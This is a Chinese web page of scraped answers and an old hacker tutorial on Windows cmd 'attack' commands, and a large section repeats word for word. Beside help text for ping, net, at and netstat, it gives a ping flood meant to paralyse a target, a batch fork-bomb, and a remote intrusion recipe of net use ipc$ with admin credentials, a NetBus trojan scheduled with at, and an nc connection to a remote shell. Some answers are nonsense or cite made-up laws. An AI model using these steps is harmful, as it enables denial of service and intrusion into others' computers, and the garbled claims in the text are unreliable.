cmd攻击命令大全(cmdIP攻击命令大全)
最后更新:2024-03-29 17:18:42 手机定位技术交流文章
cmd攻击别人电脑命令,
无法攻击别人电脑,但是可以访问别人电脑。如下参考:1.在桌面上,单击“开始”,单击“运行”。2.输入输入CMDCMD并单击ok。3.或单击“开始”,并输入CMD。4.单击搜索CMD,然后您可以输入属。5.单击“计算机”,单击“磁盘C。6.搜索CMD.Exe,点击搜索软件,然后就可以进入别人的电脑内部,可以控制电脑了。
把你邮箱发给我,给你一个我用Python做的攻击器,只要知道对方IP,分分钟对方死机(原理:运用缓冲区溢出和网络堵塞以及网络欺骗原理,因为中国的防火墙对PING非常敏感,只要你使用此命令,并且重复向对方发送数据包,将会被中国网络安全联合部发现,根据中华人民共和国网络协议,将会犯罪。当然,我们精深的黑客当然会有一些办法躲避防火墙监视,先用PING进行网络堵塞攻击,我说了,中国防火墙对PING非常敏感,所以将会来监视,在这时,我们就用到了一个程序员都知道的原理:计算机只会听人指挥,不会有思维,你要他干什么,他就会干什么,你不让他停止,他就永远不会停止。所以,防火墙就会一直监视PING命令。这是,我们就运用缓冲区溢出原理,向对方不断发送PING,当然,既然防火墙都去监视之前的PING了,这个PING自然就会看轻。所以可以将数据包设置为1000-65500。这时候,网络欺骗将会生效,我用Python代码进行欺骗,欺骗对方IP,说“我”不是攻击者,xxx.xxx.xxx.xxx(任意IP)才是攻击者!这样,就会欺骗对方计算机。于是,就进行了很好的掩饰。就可以通过python程序的PING指令进行攻击了。对方严重的话20分钟卡死,重启其实就可以了,可能你会问我,为什么不让对方完蛋。例如黑客常用的“wnuke”“冰河”等,都会对对方进行严重的损失,违反了中华人民共和国网络协议,所以,让对方死机已经很可以了。如果你想要让局域网内的计算机断网的C++或Java代码,我可以给你用,但是,请不要违法!)攻击器样式如下(大概):-大概样式-
工欲善其事,必先利其器”——当然不是让你再满世界去找新的黑客软件啦(其实我不反对使用这些软件,相反我很喜欢用它们,但是必须是在知其所以然的情况下使用,才有可能对自身的电脑水平有所帮助),要进行入侵工作的话,至少(我认为)得装上NT操作系统,以它作为入侵平台,因为NT本身对网络的支持可以说比WIN9X来得更强大得多……当然,如果想对UNIX系统动点小手术(网络中的UNIX可始终还是主流呀)而又没钱装UNIX的话,LINUX也极佳的选择(特别是现在国内至少有七八种中文LINUX版本——想当年要给REDHAT配上中文支持是何等麻烦……),至少你可以借此了解UNIX系统的基本操作以及文件存放位置、系统配置、编译器、各种动作之后的记录等等…… 然后还得再学点编程语言,至少C与UNIX下的SHELL编程得会一点,能看懂人家写的利用各种漏洞的程序,能对它进行修改,偶尔还能写几个小程序放到网上让大伙儿乐乐,这样玩起来才可能有成就感(其实我自己还不太行,但这多少是个目标)好了,废话少说,先讲讲一些MS系统里自带的相关网络程序的使用吧。在MS的操作系统中,与网络安全较有关系的几个命令/程序是:pingwinipcfgtracertnetatnetstat,且待我慢慢道来:1. ping:这是TCP/IP协议中最有用的命令之一它给另一个系统发送一系列的数据包,该系统本身又发回一个响应,这条实用程序对查找远程主机很有用,它返回的结果表示是否能到达主机,宿主机发送一个返回数据包需要多长时间。Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS][-r count] [-s count] [[-j host-list] | [-k host-list]][-w timeout] destination-listOptions:-t Ping the specifed host until interrupted.(除非人为中止,否则一直ping下去)-a Resolve addresses to hostnames.(把IP转为主机名)-n count Number of echo requests to send.(响应请求的数量)-l size Send buffer size.(封包的大小)-f Set Don't Fragment flag in packet.(信息包中无碎片)-i TTL Time To Live.(时间)-v TOS Type Of Service.(服务类型)-r count Record route for count hops.-s count Timestamp for count hops.-j host-list Loose source route along host-list.-k host-list Strict source route along host-list.(较严格的……唉,怎么译好……算了,放着吧)-w timeout Timeout in milliseconds to wait for each reply.(timeout的时间)比如大家可能都知道的一个命令 # ping -f -s 65000 ***.***.***.***或者前阶段大家所谓ping死霉国佬时所用的命令(当然这样只会造成我方自己的网络阻塞)。其实这个命令主要是用来看对方应答的速度,如果怎么ping 得到的结果都是request time out。那恐怕你根本就不用你去找这台主机了,它不在你的射程之内。2. winipcfg:这是用来看自己IP位址的小工具,win98自带,NT里则网络监视器里就能看到IP了,还有个小实用程序叫……好象是叫IPCONFIG吧,没怎么用,都快忘了……这种东东网上其实相当之多,但既然“自带”,又何须外求,何况网上下载的黑客的东东里有没有特洛伊犹未可知,再说了,如果你不是在自己的“爱姬”上运行,岂不是就没法干活?——哈,不好意思,跑题了,但——接着跑两句:可以把一些常用的、经典的工具上传到网上,当作一个备份,什么时候在网吧、某家公司要干活的话,直接下载就是一个完整无缺的工具包了。这个东东相当简单,直接在DOS下键入命令就是了,没有什么参数。3. tracert:是验证通往远程主机路径的实用程序用法: tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name参数:-d Do not resolve addresses to hostnames.(不将IP转为主机名)-h maximum_hops Maximum number of hops to search for target.(最大跟踪数量)-j host-list Loose source route along host-list.-w timeout Wait timeout milliseconds for each reply.(time out 的时间)最简单的用法就是 tracert hostname 其中hostname是计算机名或你想跟踪其路径的计算机的IP地址。TRACERT将返回数据包借以到达最终目的地的各种IP地址,你知道该怎么利用它吗?我略为解释一下吧:跟踪通往210.142.192.130的路由,最大30:第一行:*&^%&* 我就是从这里出去的(呵,真不想说^&^)第四行:是不是快要出国了呢?第九行:呀!这是日本鬼子的地盘……4. net:这可是个非常棒的东西,如果不会用的话,赶紧睁大眼睛噢这个命令的语法是: 可用的命令包括:NET ACCOUNTS NET HELP NET SHARENET COMPUTER NET HELPMSG NET STARTNET CONFIG NET LOCALGROUP NET STATISTICSNET CONFIG SERVER NET NAME NET STOPNET CONFIG WORKSTATION NET PAUSE NET TIMENET CONTINUE NET PRINT NET USENET FILE NET SEND NET USERNET GROUP NET SESSION NET VIEWNET HELP SERVICES 列出用户可以启动的网络服务。NET HELP SYNTAX 解释如何阅读 NET HELP 语法行。NET HELP command | MORE 用于逐屏显示帮助。我可就不逐样解释了——这样会把我的手指累坏,就说说常用的两个命令吧a.net view这个命令的语法是:NET VIEW [\computername | /DOMAIN[:domainname]]NET VIEW /NETWORK:NW [\computername]NET VIEW 用于显示一个计算机上共享资源的列表。当不带选项使用本命令时,它就会显示当前域或网络上的计算机上的列表。\computername 指用户希望浏览其共享资源的计算机。/DOMAIN:domainname 指定用户希望浏览有效的计算机所在的域。如果省略了域名,就会显示局域网络上的所有域。/NETWORK:NW 显示 NetWare 网络上所有可用的服务器。如果指定了一个计算机名,就会显示NetWare 网络中那个计算机上的可用资源。至于举例嘛,比如你知道一个远程计算机***.***.**.***上有开资源共享,那么运行net view \***.***.**.*** 就可以了b.net use这个命令的语法是:NET USE [devicename | *] [\computernamesharename[volume] [password | *]][/USER:[domainname]username][[/DELETE] | [/PERSISTENT:{YES | NO}]]NET USE [devicename | *] [password | *]] [/HOME]NET USE [/PERSISTENT:{YES | NO}]NET USE 用于将计算机与共享的资源相连接,或者切断计算机与共享资源的连接。当不带选项使用本命令时,它会列出计算机的连接。devicename 指定一个名字以便与资源相连接,或者指定要切断的设备。有两种类型的设备名:磁盘驱动器 (D: 至 Z:) 和打印机 (LPT1: 至 LPT3:)。输入一个星号来代替一个指定的设备名可以分配下一个可用设备名。\computername 指控制共享资源的计算机的名字。如果计算机名中包含有空字符,就要将双反斜线 (\) 和计算机名一起用引号 (" ")括起来。计算机名可以有1 到15 个字符。sharename 指共享资源的网络名字。volume 指定一个服务器上的 NetWare 卷。用户必须安装 Netware 的客户服务(Windows NT 工作站) 或者 Netware 的网关服务 (Windows NT 服务器) 并使之与NetWare 服务器相连。password 指访问共享资源所需要的密码。* 进行密码提示。当在密码提示符下输入密码时,密码是不会显示的。/USER 指定连接时的一个不同的用户名。domainname 指定另外一个域。如果缺省域,就会使用当前登录的域。username 指定登录的用户名。/HOME 将用户与他们的宿主目录相连。/DELETE 取消一个网络连接,并且从永久连接列表中删除该连接。/PERSISTENT 控制对永久网络连接的使用。其缺省值是最近使用的设置。YES 在连接产生时保存它们,并在下次登录时恢复它们。NO 不保存正在产生的连接或后续的连接;现有的连接将在下次登录时被恢复。可以使用 /DELETE 选项开关来删除永久连接。PS:前两天在绿色兵团的贴子里见到一位仁兄的话,与这个命令有异曲共工之妙,也说明一个大概:在浏览器中输入 file:///\***.***.**.***c则网上共享的C盘内容就会显示出来了,就仿佛用浏览器上FTP站点看到的一样。各位不妨试试,还可试试举一反三……5.at: 排定在特定的日期和时间运行某些命令和程序。运行 AT 命令之前必须先启动 Schedule 服务。瞧,现炒就得现卖,刚学了net命令,但这个start命令我可没详述,自已看看帮助文件,摸索一下各种命令的用法吧。C:>net start scheduleSchedule 正在启动服务.....Schedulw 服务启动成功。AT [\computername] [ [id] [/DELETE] | /DELETE [/YES]]AT [\computername] time [/INTERACTIVE][ /EVERY:date[,...] | /NEXT:date[,...]] "command"\computername 指定远程计算机。如果省略这个参数命令会被排定在本机上运行。id 指定给排定进度命令的识别号。/delete 删除某个已排定进度的命令。如果省略标识,计算机上所有已排定进度的命令都会被删除。/yes 用于删除所有作业,且不想在运行删除时显示确认信息 。time 指定命令运行的时间。interactive 允许作业在运行时,与用户通过桌面交互。/every:date[,...] 指定在每周或每月的某日 (或某几日) 运行命令。如果省略日期,则默认为在每月的本日运行。/next:date[,...] 指定在下一个指定日期 (如,下周三),运行命令。如果省略日期,则默认为在每月的本日运行。"command" 准备运行的 Windows NT 命令或批处理文件。知道了如何使用AT,再来看看如何在远程NT上运行ntsrv.exe:1 利用管理员登陆到目的服务器,方法为: net use \x.x.x.xipc$ "adminpwd" /user:"adminuser"2 利用ntsrv.exe启动远程: netsvc \x.x.x.x schedule /start3 利用AT.EXE在远程服务器设置程序定时运行,当然最快运行最理想,所以,你可以用letmein.exe得到服务器的时间,然后:at \x.x.x.x 00:00 ntsrv.exe /port:64321其中00:00要改为用letmein.exe得回来的具体时间+一点容量,等一会后,再在本地启动netbus.exe,键入目的服务器得ip地址或hostname,连接!比如第一种方法,你想要在目的服务器运行诸如病毒之类的东东,可以利用netbus得上传功能,将各种“大补丸”上传至目的服务器,再用netbus的"Start program",键入完整路径,就ok了!第二种方法是利用netbus的“App redirect”功能,启动远程telnet服务,如下:在netbus中击“App redirect”,键入"C:>winntsystem32cmd.exe",Port为:4321,服务就启动了,然后在本地运行:nc x.x.x.x 4321,出现dos启动的画面就表示连接成功:Microsoft(R) Windows NT(TM)(C) Copyright 1985-1996 Microsoft Corp.C:>注:这里有一小段是抄KILLUSA的文章——别找我要稿费啊^&^4.netstat 这是一个观察网络连接状态的实用工具。它能检验IP的当前连接状态,在断定你的基本级通信正在进行后,就要验证系统上的服务。这个服务包括检查正在收听输入的通信量和/或验证你正在创建一个与远程站点的会话,它可以很轻松地做到这一点。网上也可以看到很多如X-netstat之类的工具,是WIN界面的,更加直观而已,并没有多什么功能,这个命令的具体用法如下:Displays protocol statistics and current TCP/IP network connections.(显示协议与当前网络连接)NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]-a Displays all connections and listening ports.(显示所有连接和监听端口)-e Displays Ethernet statistics. This may be combined with the -soption.(显示以太连接,可以与-s连用)-n Displays addresses and port numbers in numerical form.(显示地址和端口)-p proto Shows connections for the protocol specified by proto; protomay be TCP or UDP. If used with the -s option to displayper-protocol statistics, proto may be TCP, UDP, or IP.-r Displays the routing table.-s Displays per-protocol statistics. By default, statistics areshown for TCP, UDP and IP; the -p option may be used to specifya subset of the default.interval Redisplays selected statistics, pausing interval secondsbetween each display. Press CTRL+C to stop redisplayingstatistics. If omitted, netstat will print the currentconfiguration information once.(interval是设定一个刷新时间,在间隔时间内暂停,按CTRL+C停止……) 这是我在本机未连接网络时运行的,第一列为协议,第二列为本地地址,第三列是与你进行连接的主机或用户的IP位址(IP后冒号之后的数字是端口号),最后一列是状态。这个命令以-n和-a的参数我较常使用,读者可以参考使用。
ping命令详解 对于Windows下ping命令相信大家已经再熟悉不过了,但是能把ping的功能发挥到最大的人却并不是很多,当然我也并不是说我可以让ping发挥最大的功能,我也只不过经常用ping这个工具,也总结了一些小经验,现在和大家分享一下。现在我就参照ping命令的帮助说明来给大家说说我使用ping时会用到的技巧,ping只有在安装了TCP/IP协议以后才可以使用:ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [[-j computer-list] | [-k computer-list]] [-wz timeout] destination-listOptions:-t Ping the specified host until stopped.To see statistics and continue - type Control-Break;To stop - type Control-C.不停的ping地方主机,直到你按下Control-C。此功能没有什么特别的技巧,不过可以配合其他参数使用,将在下面提到。-a Resolve addresses to hostnames.解析计算机NetBios名。示例:C:\>ping -a 192.168.1.21Pinging iceblood.yofor.com [192.168.1.21] with 32 bytes of data:Reply from 192.168.1.21: bytes=32 time<10ms TTL=254Reply from 192.168.1.21: bytes=32 time<10ms TTL=254Reply from 192.168.1.21: bytes=32 time<10ms TTL=254Reply from 192.168.1.21: bytes=32 time<10ms TTL=254Ping statistics for 192.168.1.21:Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in milli-seconds:Minimum = 0ms, Maximum = 0ms, Average = 0ms从上面就可以知道IP为192.168.1.21的计算机NetBios名为iceblood.yofor.com。-n count Number of echo requests to send.发送count指定的Echo数据包数。在默认情况下,一般都只发送四个数据包,通过这个命令可以自己定义发送的个数,对衡量网络速度很有帮助,比如我想测试发送50个数据包的返回的平均时间为多少,最快时间为多少,最慢时间为多少就可以通过以下获知:C:\>ping -n 50 202.103.96.68Pinging 202.103.96.68 with 32 bytes of data:Reply from 202.103.96.68: bytes=32 time=50ms TTL=241Reply from 202.103.96.68: bytes=32 time=50ms TTL=241Reply from 202.103.96.68: bytes=32 time=50ms TTL=241Request timed out.………………Reply from 202.103.96.68: bytes=32 time=50ms TTL=241Reply from 202.103.96.68: bytes=32 time=50ms TTL=241Ping statistics for 202.103.96.68:Packets: Sent = 50, Received = 48, Lost = 2 (4% loss),Approximate round trip times in milli-seconds:Minimum = 40ms, Maximum = 51ms, Average = 46ms从以上我就可以知道在给202.103.96.68发送50个数据包的过程当中,返回了48个,其中有两个由于未知原因丢失,这48个数据包当中返回速度最快为40ms,最慢为51ms,平均速度为46ms。-l size Send buffer size.定义echo数据包大小。在默认的情况下windows的ping发送的数据包大小为32byt,我们也可以自己定义它的大小,但有一个大小的限制,就是最大只能发送65500byt,也许有人会问为什么要限制到65500byt,因为Windows系列的系统都有一个安全漏洞(也许还包括其他系统)就是当向对方一次发送的数据包大于或等于65532时,对方就很有可能挡机,所以微软公司为了解决这一安全漏洞于是限制了ping的数据包大小。虽然微软公司已经做了此限制,但这个参数配合其他参数以后危害依然非常强大,比如我们就可以通过配合-t参数来实现一个带有攻击性的命令:(以下介绍带有危险性,仅用于试验,请勿轻易施于别人机器上,否则后果自负)C:\>ping -l 65500 -t 192.168.1.21Pinging 192.168.1.21 with 65500 bytes of data:Reply from 192.168.1.21: bytes=65500 time<10ms TTL=254Reply from 192.168.1.21: bytes=65500 time<10ms TTL=254………………这样它就会不停的向192.168.1.21计算机发送大小为65500byt的数据包,如果你只有一台计算机也许没有什么效果,但如果有很多计算机那么就可以使对方完全瘫痪,我曾经就做过这样的试验,当我同时使用10台以上计算机ping一台Win2000Pro系统的计算机时,不到5分钟对方的网络就已经完全瘫痪,网络严重堵塞,HTTP和FTP服务完全停止,由此可见威力非同小可。-f Set Don't Fragment flag in packet.在数据包中发送“不要分段”标志。在一般你所发送的数据包都会通过路由分段再发送给对方,加上此参数以后路由就不会再分段处理。-i TTL Time To Live.指定TTL值在对方的系统里停留的时间。此参数同样是帮助你检查网络运转情况的。-v TOS Type Of Service.将“服务类型”字段设置为 tos 指定的值。-r count Record route for count hops.在“记录路由”字段中记录传出和返回数据包的路由。在一般情况下你发送的数据包是通过一个个路由才到达对方的,但到底是经过了哪些路由呢?通过此参数就可以设定你想探测经过的路由的个数,不过限制在了9个,也就是说你只能跟踪到9个路由,如果想探测更多,可以通过其他命令实现,我将在以后的文章中给大家讲解。以下为示例:C:\>ping -n 1 -r 9 202.96.105.101 (发送一个数据包,最多记录9个路由)Pinging 202.96.105.101 with 32 bytes of data:Reply from 202.96.105.101: bytes=32 time=10ms TTL=249Route: 202.107.208.187 ->202.107.210.214 ->61.153.112.70 ->61.153.112.89 ->202.96.105.149 ->202.96.105.97 ->202.96.105.101 ->202.96.105.150 ->61.153.112.90Ping statistics for 202.96.105.101:Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),Approximate round trip times in milli-seconds:Minimum = 10ms, Maximum = 10ms, Average = 10ms从上面我就可以知道从我的计算机到202.96.105.101一共通过了202.107.208.187 ,202.107.210.214 , 61.153.112.70 , 61.153.112.89 , 202.96.105.149 , 202.96.105.97这几个路由。-s count Timestamp for count hops.指定 count 指定的跃点数的时间戳。此参数和-r差不多,只是这个参数不记录数据包返回所经过的路由,最多也只记录4个。-j host-list Loose source route along host-list.利用 computer-list 指定的计算机列表路由数据包。连续计算机可以被中间网关分隔(路由稀疏源)IP 允许的最大数量为 9。-k host-list Strict source route along host-list.利用 computer-list 指定的计算机列表路由数据包。连续计算机不能被中间网关分隔(路由严格源)IP 允许的最大数量为 9。-w timeout Timeout in milliseconds to wait for each reply.指定超时间隔,单位为毫秒。此参数没有什么其他技巧。ping命令的其他技巧:在一般情况下还可以通过ping对方让对方返回给你的TTL值大小,粗略的判断目标主机的系统类型是Windows系列还是UNIX/Linux系列,一般情况下Windows系列的系统返回的TTL值在100-130之间,而UNIX/Linux系列的系统返回的TTL值在240-255之间,当然TTL的值在对方的主机里是可以修改的,Windows系列的系统可以通过修改注册表以下键值实现:[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]"DefaultTTL"=dword:000000ff255---FF128---8064----4032----20 好了,ping命令也基本上完全讲解完了
1.新建文档 输入 :startstart cmdgoto start后缀名改为bat远程连接127.0.0.1 (任意ip)将文件放在他的电脑里或输入shutdown -s -r我只是个孩子 只懂这点shutdown -s -t 60 表示一分钟后关机 taskkill -f -im cmd.exe表示关闭cmd
把你邮箱发给我,给你一个我用Python做的攻击器,只要知道对方IP,分分钟对方死机(原理:运用缓冲区溢出和网络堵塞以及网络欺骗原理,因为中国的防火墙对PING非常敏感,只要你使用此命令,并且重复向对方发送数据包,将会被中国网络安全联合部发现,根据中华人民共和国网络协议,将会犯罪。当然,我们精深的黑客当然会有一些办法躲避防火墙监视,先用PING进行网络堵塞攻击,我说了,中国防火墙对PING非常敏感,所以将会来监视,在这时,我们就用到了一个程序员都知道的原理:计算机只会听人指挥,不会有思维,你要他干什么,他就会干什么,你不让他停止,他就永远不会停止。所以,防火墙就会一直监视PING命令。这是,我们就运用缓冲区溢出原理,向对方不断发送PING,当然,既然防火墙都去监视之前的PING了,这个PING自然就会看轻。所以可以将数据包设置为1000-65500。这时候,网络欺骗将会生效,我用Python代码进行欺骗,欺骗对方IP,说“我”不是攻击者,xxx.xxx.xxx.xxx(任意IP)才是攻击者!这样,就会欺骗对方计算机。于是,就进行了很好的掩饰。就可以通过python程序的PING指令进行攻击了。对方严重的话20分钟卡死,重启其实就可以了,可能你会问我,为什么不让对方完蛋。例如黑客常用的“wnuke”“冰河”等,都会对对方进行严重的损失,违反了中华人民共和国网络协议,所以,让对方死机已经很可以了。如果你想要让局域网内的计算机断网的C++或Java代码,我可以给你用,但是,请不要违法!)攻击器样式如下(大概):-大概样式-
工欲善其事,必先利其器”——当然不是让你再满世界去找新的黑客软件啦(其实我不反对使用这些软件,相反我很喜欢用它们,但是必须是在知其所以然的情况下使用,才有可能对自身的电脑水平有所帮助),要进行入侵工作的话,至少(我认为)得装上NT操作系统,以它作为入侵平台,因为NT本身对网络的支持可以说比WIN9X来得更强大得多……当然,如果想对UNIX系统动点小手术(网络中的UNIX可始终还是主流呀)而又没钱装UNIX的话,LINUX也极佳的选择(特别是现在国内至少有七八种中文LINUX版本——想当年要给REDHAT配上中文支持是何等麻烦……),至少你可以借此了解UNIX系统的基本操作以及文件存放位置、系统配置、编译器、各种动作之后的记录等等…… 然后还得再学点编程语言,至少C与UNIX下的SHELL编程得会一点,能看懂人家写的利用各种漏洞的程序,能对它进行修改,偶尔还能写几个小程序放到网上让大伙儿乐乐,这样玩起来才可能有成就感(其实我自己还不太行,但这多少是个目标)好了,废话少说,先讲讲一些MS系统里自带的相关网络程序的使用吧。在MS的操作系统中,与网络安全较有关系的几个命令/程序是:pingwinipcfgtracertnetatnetstat,且待我慢慢道来:1. ping:这是TCP/IP协议中最有用的命令之一它给另一个系统发送一系列的数据包,该系统本身又发回一个响应,这条实用程序对查找远程主机很有用,它返回的结果表示是否能到达主机,宿主机发送一个返回数据包需要多长时间。Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS][-r count] [-s count] [[-j host-list] | [-k host-list]][-w timeout] destination-listOptions:-t Ping the specifed host until interrupted.(除非人为中止,否则一直ping下去)-a Resolve addresses to hostnames.(把IP转为主机名)-n count Number of echo requests to send.(响应请求的数量)-l size Send buffer size.(封包的大小)-f Set Don't Fragment flag in packet.(信息包中无碎片)-i TTL Time To Live.(时间)-v TOS Type Of Service.(服务类型)-r count Record route for count hops.-s count Timestamp for count hops.-j host-list Loose source route along host-list.-k host-list Strict source route along host-list.(较严格的……唉,怎么译好……算了,放着吧)-w timeout Timeout in milliseconds to wait for each reply.(timeout的时间)比如大家可能都知道的一个命令 # ping -f -s 65000 ***.***.***.***或者前阶段大家所谓ping死霉国佬时所用的命令(当然这样只会造成我方自己的网络阻塞)。其实这个命令主要是用来看对方应答的速度,如果怎么ping 得到的结果都是request time out。那恐怕你根本就不用你去找这台主机了,它不在你的射程之内。2. winipcfg:这是用来看自己IP位址的小工具,win98自带,NT里则网络监视器里就能看到IP了,还有个小实用程序叫……好象是叫IPCONFIG吧,没怎么用,都快忘了……这种东东网上其实相当之多,但既然“自带”,又何须外求,何况网上下载的黑客的东东里有没有特洛伊犹未可知,再说了,如果你不是在自己的“爱姬”上运行,岂不是就没法干活?——哈,不好意思,跑题了,但——接着跑两句:可以把一些常用的、经典的工具上传到网上,当作一个备份,什么时候在网吧、某家公司要干活的话,直接下载就是一个完整无缺的工具包了。这个东东相当简单,直接在DOS下键入命令就是了,没有什么参数。3. tracert:是验证通往远程主机路径的实用程序用法: tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name参数:-d Do not resolve addresses to hostnames.(不将IP转为主机名)-h maximum_hops Maximum number of hops to search for target.(最大跟踪数量)-j host-list Loose source route along host-list.-w timeout Wait timeout milliseconds for each reply.(time out 的时间)最简单的用法就是 tracert hostname 其中hostname是计算机名或你想跟踪其路径的计算机的IP地址。TRACERT将返回数据包借以到达最终目的地的各种IP地址,你知道该怎么利用它吗?我略为解释一下吧:跟踪通往210.142.192.130的路由,最大30:第一行:*&^%&* 我就是从这里出去的(呵,真不想说^&^)第四行:是不是快要出国了呢?第九行:呀!这是日本鬼子的地盘……4. net:这可是个非常棒的东西,如果不会用的话,赶紧睁大眼睛噢这个命令的语法是: 可用的命令包括:NET ACCOUNTS NET HELP NET SHARENET COMPUTER NET HELPMSG NET STARTNET CONFIG NET LOCALGROUP NET STATISTICSNET CONFIG SERVER NET NAME NET STOPNET CONFIG WORKSTATION NET PAUSE NET TIMENET CONTINUE NET PRINT NET USENET FILE NET SEND NET USERNET GROUP NET SESSION NET VIEWNET HELP SERVICES 列出用户可以启动的网络服务。NET HELP SYNTAX 解释如何阅读 NET HELP 语法行。NET HELP command | MORE 用于逐屏显示帮助。我可就不逐样解释了——这样会把我的手指累坏,就说说常用的两个命令吧a.net view这个命令的语法是:NET VIEW [\computername | /DOMAIN[:domainname]]NET VIEW /NETWORK:NW [\computername]NET VIEW 用于显示一个计算机上共享资源的列表。当不带选项使用本命令时,它就会显示当前域或网络上的计算机上的列表。\computername 指用户希望浏览其共享资源的计算机。/DOMAIN:domainname 指定用户希望浏览有效的计算机所在的域。如果省略了域名,就会显示局域网络上的所有域。/NETWORK:NW 显示 NetWare 网络上所有可用的服务器。如果指定了一个计算机名,就会显示NetWare 网络中那个计算机上的可用资源。至于举例嘛,比如你知道一个远程计算机***.***.**.***上有开资源共享,那么运行net view \***.***.**.*** 就可以了b.net use这个命令的语法是:NET USE [devicename | *] [\computernamesharename[volume] [password | *]][/USER:[domainname]username][[/DELETE] | [/PERSISTENT:{YES | NO}]]NET USE [devicename | *] [password | *]] [/HOME]NET USE [/PERSISTENT:{YES | NO}]NET USE 用于将计算机与共享的资源相连接,或者切断计算机与共享资源的连接。当不带选项使用本命令时,它会列出计算机的连接。devicename 指定一个名字以便与资源相连接,或者指定要切断的设备。有两种类型的设备名:磁盘驱动器 (D: 至 Z:) 和打印机 (LPT1: 至 LPT3:)。输入一个星号来代替一个指定的设备名可以分配下一个可用设备名。\computername 指控制共享资源的计算机的名字。如果计算机名中包含有空字符,就要将双反斜线 (\) 和计算机名一起用引号 (" ")括起来。计算机名可以有1 到15 个字符。sharename 指共享资源的网络名字。volume 指定一个服务器上的 NetWare 卷。用户必须安装 Netware 的客户服务(Windows NT 工作站) 或者 Netware 的网关服务 (Windows NT 服务器) 并使之与NetWare 服务器相连。password 指访问共享资源所需要的密码。* 进行密码提示。当在密码提示符下输入密码时,密码是不会显示的。/USER 指定连接时的一个不同的用户名。domainname 指定另外一个域。如果缺省域,就会使用当前登录的域。username 指定登录的用户名。/HOME 将用户与他们的宿主目录相连。/DELETE 取消一个网络连接,并且从永久连接列表中删除该连接。/PERSISTENT 控制对永久网络连接的使用。其缺省值是最近使用的设置。YES 在连接产生时保存它们,并在下次登录时恢复它们。NO 不保存正在产生的连接或后续的连接;现有的连接将在下次登录时被恢复。可以使用 /DELETE 选项开关来删除永久连接。PS:前两天在绿色兵团的贴子里见到一位仁兄的话,与这个命令有异曲共工之妙,也说明一个大概:在浏览器中输入 file:///\***.***.**.***c则网上共享的C盘内容就会显示出来了,就仿佛用浏览器上FTP站点看到的一样。各位不妨试试,还可试试举一反三……5.at: 排定在特定的日期和时间运行某些命令和程序。运行 AT 命令之前必须先启动 Schedule 服务。瞧,现炒就得现卖,刚学了net命令,但这个start命令我可没详述,自已看看帮助文件,摸索一下各种命令的用法吧。C:>net start scheduleSchedule 正在启动服务.....Schedulw 服务启动成功。AT [\computername] [ [id] [/DELETE] | /DELETE [/YES]]AT [\computername] time [/INTERACTIVE][ /EVERY:date[,...] | /NEXT:date[,...]] "command"\computername 指定远程计算机。如果省略这个参数命令会被排定在本机上运行。id 指定给排定进度命令的识别号。/delete 删除某个已排定进度的命令。如果省略标识,计算机上所有已排定进度的命令都会被删除。/yes 用于删除所有作业,且不想在运行删除时显示确认信息 。time 指定命令运行的时间。interactive 允许作业在运行时,与用户通过桌面交互。/every:date[,...] 指定在每周或每月的某日 (或某几日) 运行命令。如果省略日期,则默认为在每月的本日运行。/next:date[,...] 指定在下一个指定日期 (如,下周三),运行命令。如果省略日期,则默认为在每月的本日运行。"command" 准备运行的 Windows NT 命令或批处理文件。知道了如何使用AT,再来看看如何在远程NT上运行ntsrv.exe:1 利用管理员登陆到目的服务器,方法为: net use \x.x.x.xipc$ "adminpwd" /user:"adminuser"2 利用ntsrv.exe启动远程: netsvc \x.x.x.x schedule /start3 利用AT.EXE在远程服务器设置程序定时运行,当然最快运行最理想,所以,你可以用letmein.exe得到服务器的时间,然后:at \x.x.x.x 00:00 ntsrv.exe /port:64321其中00:00要改为用letmein.exe得回来的具体时间+一点容量,等一会后,再在本地启动netbus.exe,键入目的服务器得ip地址或hostname,连接!比如第一种方法,你想要在目的服务器运行诸如病毒之类的东东,可以利用netbus得上传功能,将各种“大补丸”上传至目的服务器,再用netbus的"Start program",键入完整路径,就ok了!第二种方法是利用netbus的“App redirect”功能,启动远程telnet服务,如下:在netbus中击“App redirect”,键入"C:>winntsystem32cmd.exe",Port为:4321,服务就启动了,然后在本地运行:nc x.x.x.x 4321,出现dos启动的画面就表示连接成功:Microsoft(R) Windows NT(TM)(C) Copyright 1985-1996 Microsoft Corp.C:>注:这里有一小段是抄KILLUSA的文章——别找我要稿费啊^&^4.netstat 这是一个观察网络连接状态的实用工具。它能检验IP的当前连接状态,在断定你的基本级通信正在进行后,就要验证系统上的服务。这个服务包括检查正在收听输入的通信量和/或验证你正在创建一个与远程站点的会话,它可以很轻松地做到这一点。网上也可以看到很多如X-netstat之类的工具,是WIN界面的,更加直观而已,并没有多什么功能,这个命令的具体用法如下:Displays protocol statistics and current TCP/IP network connections.(显示协议与当前网络连接)NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]-a Displays all connections and listening ports.(显示所有连接和监听端口)-e Displays Ethernet statistics. This may be combined with the -soption.(显示以太连接,可以与-s连用)-n Displays addresses and port numbers in numerical form.(显示地址和端口)-p proto Shows connections for the protocol specified by proto; protomay be TCP or UDP. If used with the -s option to displayper-protocol statistics, proto may be TCP, UDP, or IP.-r Displays the routing table.-s Displays per-protocol statistics. By default, statistics areshown for TCP, UDP and IP; the -p option may be used to specifya subset of the default.interval Redisplays selected statistics, pausing interval secondsbetween each display. Press CTRL+C to stop redisplayingstatistics. If omitted, netstat will print the currentconfiguration information once.(interval是设定一个刷新时间,在间隔时间内暂停,按CTRL+C停止……) 这是我在本机未连接网络时运行的,第一列为协议,第二列为本地地址,第三列是与你进行连接的主机或用户的IP位址(IP后冒号之后的数字是端口号),最后一列是状态。这个命令以-n和-a的参数我较常使用,读者可以参考使用。
